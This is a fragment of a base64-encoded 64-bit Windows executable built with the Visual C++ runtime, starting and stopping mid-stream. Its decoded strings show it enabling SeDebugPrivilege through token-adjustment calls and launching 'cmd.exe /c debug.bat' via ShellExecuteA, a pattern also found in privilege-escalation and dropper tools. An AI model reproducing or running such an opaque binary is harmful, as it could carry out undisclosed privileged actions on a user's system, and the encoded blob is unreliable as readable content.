gBpAHQAaQBhAGwAaQB6AGUAZAANAAoAAAAAAAAAAAAAAAAAUgA2ADAAMgA4AA0ACgAtACAAdQBuAGEAYgBsAGUAIAB0AG8AIABpAG4AaQB0AGkAYQBsAGkAegBlACAAaABlAGEAcAANAAoAAAAAAAAAAABSADYAMAAyADcADQAKAC0AIABuAG8AdAAgAGUAbgBvAHUAZwBoACAAcwBwAGEAYwBlACAAZgBvAHIAIABsAG8AdwBpAG8AIABpAG4AaQB0AGkAYQBsAGkAegBhAHQAaQBvAG4ADQAKAAAAAAAAAAAAUgA2ADAAMgA2AA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAcwB0AGQAaQBvACAAaQBuAGkAdABpAGEAbABpAHoAYQB0AGkAbwBuAA0ACgAAAAAAAAAAAFIANgAwADIANQANAAoALQAgAHAAdQByAGUAIAB2AGkAcgB0AHUAYQBsACAAZgB1AG4AYwB0AGkAbwBuACAAYwBhAGwAbAANAAoAAAAAAAAAUgA2ADAAMgA0AA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAXwBvAG4AZQB4AGkAdAAvAGEAdABlAHgAaQB0ACAAdABhAGIAbABlAA0ACgAAAAAAAAAAAFIANgAwADEAOQANAAoALQAgAHUAbgBhAGIAbABlACAAdABvACAAbwBwAGUAbgAgAGMAbwBuAHMAbwBsAGUAIABkAGUAdgBpAGMAZQANAAoAAAAAAAAAAAAAAAAAAAAAAFIANgAwADEAOAANAAoALQAgAHUAbgBlAHgAcABlAGMAdABlAGQAIABoAGUAYQBwACAAZQByAHIAbwByAA0ACgAAAAAAAAAAAAAAAAAAAAAAUgA2ADAAMQA3AA0ACgAtACAAdQBuAGUAeABwAGUAYwB0AGUAZAAgAG0AdQBsAHQAaQB0AGgAcgBlAGEAZAAgAGwAbwBjAGsAIABlAHIAcgBvAHIADQAKAAAAAAAAAAAAUgA2ADAAMQA2AA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAdABoAHIAZQBhAGQAIABkAGEAdABhAA0ACgAAAAAAAAAAAAAAUgA2ADAAMQAwAA0ACgAtACAAYQBiAG8AcgB0ACgAKQAgAGgAYQBzACAAYgBlAGUAbgAgAGMAYQBsAGwAZQBkAA0ACgAAAAAAAAAAAAAAAABSADYAMAAwADkADQAKAC0AIABuAG8AdAAgAGUAbgBvAHUAZwBoACAAcwBwAGEAYwBlACAAZgBvAHIAIABlAG4AdgBpAHIAbwBuAG0AZQBuAHQADQAKAAAAAAAAAAAAAABSADYAMAAwADgADQAKAC0AIABuAG8AdAAgAGUAbgBvAHUAZwBoACAAcwBwAGEAYwBlACAAZgBvAHIAIABhAHIAZwB1AG0AZQBuAHQAcwANAAoAAAAAAAAAAAAAAAAAAABSADYAMAAwADIADQAKAC0AIABmAGwAbwBhAHQAaQBuAGcAIABwAG8AaQBuAHQAIABzAHUAcABwAG8AcgB0ACAAbgBvAHQAIABsAG8AYQBkAGUAZAANAAoAAAAAAAAAAAACAAAAAAAAAFCAAIABAAAACAAAAAAAAADwfwCAAQAAAAkAAAAAAAAAkH8AgAEAAAAKAAAAAAAAAEB/AIABAAAAEAAAAAAAAADgfgCAAQAAABEAAAAAAAAAgH4AgAEAAAASAAAAAAAAADB+AIABAAAAEwAAAAAAAADQfQCAAQAAABgAAAAAAAAAYH0AgAEAAAAZAAAAAAAAABB9AIABAAAAGgAAAAAAAACgfACAAQAAABsAAAAAAAAAMHwAgAEAAAAcAAAAAAAAAOB7AIABAAAAHgAAAAAAAACYewCAAQAAAB8AAAAAAAAA0HoAgAEAAAAgAAAAAAAAAGB6AIABAAAAIQAAAAAAAABweACAAQAAAHgAAAAAAAAASHgAgAEAAAB5AAAAAAAAACh4AIABAAAAegAAAAAAAAAIeACAAQAAAPwAAAAAAAAAAHgAgAEAAAD/AAAAAAAAAOB3AIABAAAATQBpAGMAcgBvAHMAbwBmAHQAIABWAGkAcwB1AGEAbAAgAEMAKwArACAAUgB1AG4AdABpAG0AZQAgAEwAaQBiAHIAYQByAHkAAAAAAAoACgAAAAAAAAAAAC4ALgAuAAAAPABwAHIAbwBnAHIAYQBtACAAbgBhAG0AZQAgAHUAbgBrAG4AbwB3AG4APgAAAAAAUgB1AG4AdABpAG0AZQAgAEUAcgByAG8AcgAhAAoACgBQAHIAbwBnAHIAYQBtADoAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgACAAIAAgACAAIAAgACAAIAAoACgAKAAoACgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACEAIQAhACEAIQAhACEAIQAhACEABAAEAAQABAAEAAQABAAgQCBAIEAgQCBAIEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABABAAEAAQABAAEAAQAIIAggCCAIIAggCCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAQABAAEAAQACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAgACAAIAAgACAAIAAgACAAaAAoACgAKAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEBgQGBAYEBgQGBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEQABAAEAAQABAAEACCAYIBggGCAYIBggECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBEAAQABAAEAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABIABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAUABQAEAAQABAAEAAQABQAEAAQABAAEAAQABAAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBARAAAQEBAQEBAQEBAQEBAQECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgEQAAIBAgECAQIBAgECAQIBAgEBAQAAAAAAAAAAAAAAAICBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5eltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlae3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/0dldFByb2Nlc3NXaW5kb3dTdGF0aW9uAEdldFVzZXJPYmplY3RJbmZvcm1hdGlvblcAAAAAAAAAR2V0TGFzdEFjdGl2ZVBvcHVwAAAAAAAAR2V0QWN0aXZlV2luZG93AE1lc3NhZ2VCb3hXAAAAAABVAFMARQBSADMAMgAuAEQATABMAAAAAAAgQ29tcGxldGUgT2JqZWN0IExvY2F0b3InAAAAAAAAACBDbGFzcyBIaWVyYXJjaHkgRGVzY3JpcHRvcicAAAAAIEJhc2UgQ2xhc3MgQXJyYXknAAAAAAAAIEJhc2UgQ2xhc3MgRGVzY3JpcHRvciBhdCAoAAAAAAAgVHlwZSBEZXNjcmlwdG9yJwAAAAAAAABgbG9jYWwgc3RhdGljIHRocmVhZCBndWFyZCcAAAAAAGBtYW5hZ2VkIHZlY3RvciBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAAAAAGB2ZWN0b3IgdmJhc2UgY29weSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAAAAAAAAAGB2ZWN0b3IgY29weSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAAAAAABgZHluYW1pYyBhdGV4aXQgZGVzdHJ1Y3RvciBmb3IgJwAAAAAAAAAAYGR5bmFtaWMgaW5pdGlhbGl6ZXIgZm9yICcAAAAAAABgZWggdmVjdG9yIHZiYXNlIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAAABgZWggdmVjdG9yIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAYG1hbmFnZWQgdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAAAAAGBtYW5hZ2VkIHZlY3RvciBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAABgcGxhY2VtZW50IGRlbGV0ZVtdIGNsb3N1cmUnAAAAAGBwbGFjZW1lbnQgZGVsZXRlIGNsb3N1cmUnAAAAAAAAYG9tbmkgY2FsbHNpZycAACBkZWxldGVbXQAAACBuZXdbXQAAAAAAAGBsb2NhbCB2ZnRhYmxlIGNvbnN0cnVjdG9yIGNsb3N1cmUnAAAAAABgbG9jYWwgdmZ0YWJsZScAYFJUVEkAAABgRUgAAAAAAGB1ZHQgcmV0dXJuaW5nJwBgY29weSBjb25zdHJ1Y3RvciBjbG9zdXJlJwAAAAAAAGBlaCB2ZWN0b3IgdmJhc2UgY29uc3RydWN0b3IgaXRlcmF0b3InAABgZWggdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAGBlaCB2ZWN0b3IgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAAAAAAABgdmlydHVhbCBkaXNwbGFjZW1lbnQgbWFwJwAAAAAAAGB2ZWN0b3IgdmJhc2UgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAAABgdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAAAAAGB2ZWN0b3IgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAYHNjYWxhciBkZWxldGluZyBkZXN0cnVjdG9yJwAAAABgZGVmYXVsdCBjb25zdHJ1Y3RvciBjbG9zdXJlJwAAAGB2ZWN0b3IgZGVsZXRpbmcgZGVzdHJ1Y3RvcicAAAAAYHZiYXNlIGRlc3RydWN0b3InAAAAAAAAYHN0cmluZycAAAAAAAAAAGBsb2NhbCBzdGF0aWMgZ3VhcmQnAAAAAGB0eXBlb2YnAAAAAAAAAABgdmNhbGwnAGB2YnRhYmxlJwAAAAAAAABgdmZ0YWJsZScAAABePQAAfD0AACY9AAA8PD0APj49ACU9AAAvPQAALT0AACs9AAAqPQAAfHwAACYmAAB8AAAAXgAAAH4AAAAoKQAALAAAAD49AAA+AAAAPD0AADwAAAAlAAAALwAAAC0+KgAmAAAAKwAAAC0AAAAtLQAAKysAACoAAAAtPgAAb3BlcmF0b3IAAAAAW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AAAAESjAAAAAAAAWKMAAAAAAABwowAAAAAAAIijAAAAAAAAlKMAAAAAAACeowAAAAAAAKqjAAAAAAAAvKMAAAAAAADKowAAAAAAANqjAAAAAAAA5qMAAAAAAAD8owAAAAAAAAikAAAAAAAAGKQAAAAAAAAupAAAAAAAAAAAAAAAAAAAAqAAAAAAAAAAAAAAAAAAAMYBR2V0Q3VycmVudFByb2Nlc3MAwARTbGVlcABSAENsb3NlSGFuZGxlAEtFUk5FTDMyLmRsbAAA9wFPcGVuUHJvY2Vzc1Rva2VuAACWAUxvb2t1cFByaXZpbGVnZVZhbHVlQQAfAEFkanVzdFRva2VuUHJpdmlsZWdlcwBBRFZBUEkzMi5kbGwAAB4BU2hlbGxFeGVjdXRlQQBTSEVMTDMyLmRsbADLAUdldEN1cnJlbnRUaHJlYWRJZAAAWwFGbHNTZXRWYWx1ZQCMAUdldENvbW1hbmRMaW5lQQDOBFRlcm1pbmF0ZVByb2Nlc3MAAOIEVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAACzBFNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgACA0lzRGVidWdnZXJQcmVzZW50ACYEUnRsVmlydHVhbFVud2luZAAAHwRSdGxMb29rdXBGdW5jdGlvbkVudHJ5AAAYBFJ0bENhcHR1cmVDb250ZXh0ACUEUnRsVW53aW5kRXgA7gBFbmNvZGVQb2ludGVyAFoBRmxzR2V0VmFsdWUAWQFGbHNGcmVlAIAEU2V0TGFzdEVycm9yAAAIAkdldExhc3RFcnJvcgAAWAFGbHNBbGxvYwAA1wJIZWFwRnJlZQAATAJHZXRQcm9jQWRkcmVzcwAAHgJHZXRNb2R1bGVIYW5kbGVXAAAfAUV4aXRQcm9jZXNzAMsARGVjb2RlUG9pbnRlcgB8BFNldEhhbmRsZUNvdW50AABrAkdldFN0ZEhhbmRsZQAA6wJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uQW5kU3BpbkNvdW50APoBR2V0RmlsZVR5cGUAagJHZXRTdGFydHVwSW5mb1cA0gBEZWxldGVDcml0aWNhbFNlY3Rpb24AGQJHZXRNb2R1bGVGaWxlTmFtZUEAAGcBRnJlZUVudmlyb25tZW50U3RyaW5nc1cAIAVXaWRlQ2hhclRvT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